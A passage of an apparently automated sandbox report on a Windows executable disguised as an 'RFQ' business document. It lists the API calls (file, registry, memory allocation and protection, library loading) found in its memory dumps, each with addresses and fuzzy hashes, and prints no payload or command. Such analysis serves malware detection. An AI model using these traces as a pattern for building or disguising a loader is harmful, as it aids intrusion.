                                                                                                              • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                              • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                              • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2547128583-0
                                                                                                            • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                            • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                            • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                            • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                            APIs
                                                                                                            • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$EnableShow
                                                                                                            • String ID:
                                                                                                            • API String ID: 1136574915-0
                                                                                                            • Opcode ID: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                            • Instruction ID: 46dfe73b81ae29a5099323896a5bc3e3d9df575198e3285abdeb67f25c429c8d
                                                                                                            • Opcode Fuzzy Hash: bfed12c821a079857a615332bdb98fb1c84882728095731f13ed5530d444e0e9
                                                                                                            • Instruction Fuzzy Hash: 76E08C326005009BCB10AFB5AA4999D3375DF90369710007BE402F10E1CABC9C409A2D
                                                                                                            APIs
                                                                                                            • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ December-January Forcast and TCL.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$AttributesCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 415043291-0
                                                                                                            • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                            • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                            • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                            • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                            • GetLastError.KERNEL32 ref: 00405714
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1375471231-0
                                                                                                            • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                            • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                            • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                            • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000), ref: 10002963
                                                                                                            • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocErrorLastVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 497505419-0
                                                                                                            • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                            • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                            • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                            • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                              • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointerwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 327478801-0
                                                                                                            • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                            • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                            • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                            • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                            APIs
                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 390214022-0
                                                                                                            • Opcode ID: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                            • Instruction ID: 9c0f32427e9d9ad9a827debec1b0d32512713181f08a0e22f3c826aa7fb996c6
                                                                                                            • Opcode Fuzzy Hash: 60b22f5a932472850941fcf3cf4ac9c96d80a2104eac916f2d4d26c3cfc5b4d4
                                                                                                            • Instruction Fuzzy Hash: 90E04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9
                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,0000047C,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open
                                                                                                            • String ID:
                                                                                                            • API String ID: 71445658-0
                                                                                                            • Opcode ID: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                            • Instruction ID: 180cb462b76767e938a43b2c67eaf1f9418a6812eb156052446fd1a81c43fca4
                                                                                                            • Opcode Fuzzy Hash: e61a0d233959cf951fd8dee32620159f1f5f2b0e63671ee31e14641033e06cac
                                                                                                            • Instruction Fuzzy Hash: 54E0BF76154108AFDB00DFA5EE46EA977ECAB44704F044025BA09E7191C674E5509768
                                                                                                            APIs
                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040320B,00000000,00416A20,000000FF,00416A20,000000FF,000000FF,00000004,00000000), ref: 00405CF0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                            • Instruction ID: d2761c75b63c3b5a1b4cb2cfb4b6a55fbed1fd27b7f8bdfe76624f6b99830631
                                                                                                            • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                            • Instruction Fuzzy Hash: 2AE0EC3221425AABDF109E55EC08FEB7B6CEF05360F049437FA55E7190D631E921DBA4
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403255,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405CC1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2738559852-0
                                                                                                            • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                            • Instruction ID: 881bd9ca443264ea0180802fa9c86a3c9bfb0e6b132b989af4612487e9445b73
                                                                                                            • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                            • Instruction Fuzzy Hash: D1E08632104259ABDF105E518C00AEB376CFB04361F104432F911E3140D630E8119FB4
                                                                                                            APIs
                                                                                                            • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                                                                            • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                                                                            • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                                                                            APIs
                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                            • Instruction ID: 4fb9e9dd77d4d4fa14caa6284e3e33111a790732df8c0ecbc47c365062d5febc
                                                                                                            • Opcode Fuzzy Hash: 9f81f92dad3f7a811467f01a8cf18fc77b7af2f5e37f886534bc513ef1489464
                                                                                                            • Instruction Fuzzy Hash: 4BD05E33B04100DBCB10DFE8AE08ADD77B5AB80338B248177E601F21E4D6B8C650AB1D
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                            • Instruction ID: f9280d834dafdcf82d79e279d22eccff0cbc279b2038abc2a2984d0c0ecbec1f
                                                                                                            • Opcode Fuzzy Hash: 3e4e113e80d15ce5a74be4961f661226ffae6a612218aa542e548efe3475e5a4
                                                                                                            • Instruction Fuzzy Hash: E3B01235180A00BBDE114B00EE09F857E62F7EC701F018438B340240F0CBB200A0DB08
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,0040353A,?), ref: 00403266
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2051518196.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2049815189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054085715.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2054730293.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2056371726.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 973152223-0
                                                                                                            • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                            • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                            • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                            • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                            APIs
                                                                                                            • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2059627724.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2059614573.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059642790.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2059657553.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_10000000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocGlobal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761449716-0
                                                                                                            • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                            • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                                                                            • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                                                                            • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                            • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
